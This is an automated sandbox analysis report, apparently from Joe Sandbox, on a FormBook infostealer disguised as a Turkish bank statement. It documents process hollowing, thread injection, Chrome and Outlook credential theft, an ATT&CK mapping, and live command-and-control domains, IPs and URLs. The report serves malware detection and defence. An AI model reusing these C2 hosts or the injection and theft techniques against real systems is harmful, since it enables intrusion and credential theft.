          Source: explorer.exe, 00000003.00000000.270321034.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.521718794.0000000005EF4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: wlanext.exe, 00000009.00000002.516322379.00000000075F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.270321034.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
          Source: explorer.exe, 00000003.00000002.527994435.000000000F5CA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllate
          Source: wlanext.exe, 00000009.00000002.516322379.00000000075F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
          Source: explorer.exe, 00000003.00000003.462549906.0000000006050000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000003.00000002.521718794.0000000005F12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A592A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_010A592A
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A592A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_010A592A
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A592A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_010A592A
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A1140 GetWindowTextLengthW,SendMessageW,CreateFileW,GetFileSize,CloseHandle,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,CloseHandle,MultiByteToWideChar,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,MultiByteToWideChar,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,SetWindowTextW,GetProcessHeap,HeapFree,SendMessageW,SendMessageW,SendMessageW,SetFocus,GetWindowTextW,lstrcmpW,GetWindowTextLengthW,SendMessageW,SendMessageW,SendMessageW,1_2_010A1140
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_0040CF23 LdrLoadDll,2_2_0040CF23
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A814A SetUnhandledExceptionFilter,1_2_010A814A
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A816D SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_010A816D
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010A814A SetUnhandledExceptionFilter,2_2_010A814A
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010A816D SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_010A816D

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.genuineinsights.cloud
          Source: C:\Windows\explorer.exeDomain query: www.octohoki.net
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.8.96 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 194.102.227.30 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.149 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cutgang.net
          Source: C:\Windows\explorer.exeDomain query: www.energybig.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.215 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.wenzid4.top
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 8A0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeThread register set: target process: 3320Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3320Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeProcess created: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exeJump to behavior
          Source: explorer.exe, 00000003.00000000.261361642.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.513327630.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000002.521361155.00000000056F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.270321034.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.261361642.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.512770295.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.261361642.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.261069205.00000000004C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.261361642.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.513327630.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_010B4563
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: GetLocaleInfoEx,__wcsnicmp,_TestDefaultCountry,_TestDefaultCountry,1_2_010BA972
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: EnumSystemLocalesEx,1_2_010AF43E
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: GetLocaleInfoEx,1_2_010AF473
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_010B3B1E
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,1_2_010A8F16
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_010B3F27
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_010AF3C6
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,1_2_010B723D
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: GetLocaleInfoEx,__wcsnicmp,_TestDefaultCountry,_TestDefaultCountry,2_2_010BA972
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_010B3B1E
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_010AF3C6
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,2_2_010B723D
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_010B4563
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: EnumSystemLocalesEx,2_2_010AF43E
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: GetLocaleInfoEx,2_2_010AF473
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,2_2_010A8F16
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_010B3F27
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010AE2E5 cpuid 1_2_010AE2E5
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A2150 GetProcessHeap,GetLocalTime,GetTimeFormatW,SendMessageW,SendMessageW,SendMessageW,GetDateFormatW,SendMessageW,1_2_010A2150
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.oaqcoreqiw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.oaqcoreqiw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\wlanext.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.oaqcoreqiw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.oaqcoreqiw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts512
          Process Injection          		2
          Obfuscated Files or Information          		LSASS Memory2
          File and Directory Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts2
          Command and Scripting Interpreter          		Logon Script (Windows)Logon Script (Windows)1
          Software Packing          		Security Account Manager25
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Masquerading          		NTDS141
          Security Software Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Virtualization/Sandbox Evasion          		LSA Secrets2
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Access Token Manipulation          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items512
          Process Injection          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          Remote System Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 808219 Sample: T.C.Ziraat Bankasi A.S_Ekst... Startdate: 15/02/2023 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 Antivirus detection for URL or domain 2->42 44 3 other signatures 2->44 9 T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe 19 2->9         started        process3 file4 26 C:\Users\user\AppData\...\oaqcoreqiw.exe, PE32 9->26 dropped 12 oaqcoreqiw.exe 9->12         started        process5 signatures6 58 Multi AV Scanner detection for dropped file 12->58 60 Maps a DLL or memory area into another process 12->60 15 oaqcoreqiw.exe 12->15         started        process7 signatures8 62 Modifies the context of a thread in another process (thread injection) 15->62 64 Maps a DLL or memory area into another process 15->64 66 Sample uses process hollowing technique 15->66 68 Queues an APC in another process (thread injection) 15->68 18 explorer.exe 3 6 15->18 injected process9 dnsIp10 28 www.energybig.xyz 184.94.215.91, 49724, 49725, 80 VXCHNGE-NC01US United States 18->28 30 cutgang.net 194.102.227.30, 80 VODAFONE_ROCharlesdeGaullenr15RO Romania 18->30 32 5 other IPs or domains 18->32 46 System process connects to network (likely due to code injection or exploit) 18->46 48 Performs DNS queries to domains with low reputation 18->48 22 wlanext.exe 13 18->22         started        signatures11 process12 dnsIp13 34 www.cutgang.net 22->34 36 cutgang.net 22->36 50 Tries to steal Mail credentials (via file / registry access) 22->50 52 Tries to harvest and steal browser information (history, passwords, etc) 22->52 54 Modifies the context of a thread in another process (thread injection) 22->54 56 Maps a DLL or memory area into another process 22->56 signatures14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe36%ReversingLabsWin32.Trojan.Woreflint
          T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe39%VirustotalBrowse
          T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe13%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.oaqcoreqiw.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.oaqcoreqiw.exe.1010000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.fluxgreenn.space0%Avira URL Cloudsafe
          http://www.cutgang.net/ghii/0%VirustotalBrowse
          http://www.wenzid4.toppOB0%Avira URL Cloudsafe
          http://www.hubyazilim.com/ghii/1%VirustotalBrowse
          http://www.sem-jobs.com/ghii/0%Avira URL Cloudsafe
          http://www.searchvity.com/?dn=100%URL Reputationmalware
          http://www.cutgang.net/0%Avira URL Cloudsafe
          http://www.ixirwholesale.xyz/ghii/0%Avira URL Cloudsafe
          http://www.searchvity.com/100%URL Reputationmalware
          http://www.octohoki.net/ghii/100%Avira URL Cloudmalware
          http://www.cutgang.net/ghii/0%Avira URL Cloudsafe
          http://www.hubyazilim.com/ghii/100%Avira URL Cloudmalware
          http://www.wenzid4.top/ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3OATx/e31Ge81BxjFPOt13FZG100%Avira URL Cloudmalware
          http://www.octohoki.net100%Avira URL Cloudmalware
          http://www.de-nagel.com/ghii/0%Avira URL Cloudsafe
          http://www.cutgang.net0%Avira URL Cloudsafe
          http://www.nortonseecurity.com/ghii/0%Avira URL Cloudsafe
          http://www.wenzid4.top0%Avira URL Cloudsafe
          http://www.assilajamiart.com/ghii/0%Avira URL Cloudsafe
          http://www.de-nagel.com0%Avira URL Cloudsafe
          http://www.7dkjhk.com0%Avira URL Cloudsafe
          http://www.octohoki.net/ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIoQK3x8J3agnpi0FJwMyByf64h100%Avira URL Cloudmalware
          http://www.ladybillplanet.com0%Avira URL Cloudsafe
          http://www.assilajamiart.com0%Avira URL Cloudsafe
          http://www.energybig.xyz/ghii/100%Avira URL Cloudmalware
          http://www.bemmulher.online/ghii/0%Avira URL Cloudsafe
